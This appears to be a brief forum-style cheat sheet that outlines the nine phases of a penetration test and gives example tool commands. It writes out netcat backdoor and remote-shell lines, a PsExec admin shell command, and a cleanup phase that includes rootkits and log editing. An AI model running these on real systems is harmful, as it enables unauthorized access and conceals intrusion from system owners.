Oldschool but still useable...

Preparation to pentesting.

1. Footprinting - Determining the targets footprint, e.g. DNS records, IP scope, public information, contact information, etc.
2. Scanning - Determining the targets openings, e.g. service ports, wireless networks, modems pools, vpn servers, etc.
3. Enumeration - Determining the services behind the openings, e.g. webservers, systems, routers, firewalls, wifi authentication, etc.
4. Penetration - Selecting appropiate exploits and penetrate the target, e.g. SQL injection, buffer overflow, password attacks, etc.
5. Escalation - Escalation of the credentials to admin or root, e.g. dll injection, local exploit, configuration change, sceduled jobs, etc.
6. Getting Interactive - Getting a remote shell or GUI on the target, e.g. RDP, VNC, NetCat, etc.
7. Expanding Influence - Moving from the initial target as a foothold or beach-head to the rest of the network taking over the domain.
8. Cleaning Up - Ensuring backdoors and removing evidence, e.g. rootkits, log removal, log editing, etc.
9. Reporting - Writing and presenting a report on the pen-test to the owners of the network one had authoritation to test.

more infos, read these

• Infosecwriters Demystifying Pen-test Article
• OSSTMM
• ISSAF
• Professionalsecuritytesters
• Penetration Testing Framework

Basic tools and examples

Portscanner

Nmap -sS -vv -P0 -n -p 21,80,443 // probing for open port

Backdoor

Nc.exe -l -p 80 // execute a backdoor and listen to port 80 for outbound connection

Nc.exe -v -e cmd.exe <the backdoored ip address > 80 // connect to backdoor

PSexec tools useful for remote access

PSexec \\ -u administrator -p password -s cmd.exe

VNC same as PSexec, it's stress on GUI

A password cracker tools

Brutus Password cracker

THC password cracker

AircrackNG WIFI - WEP cracker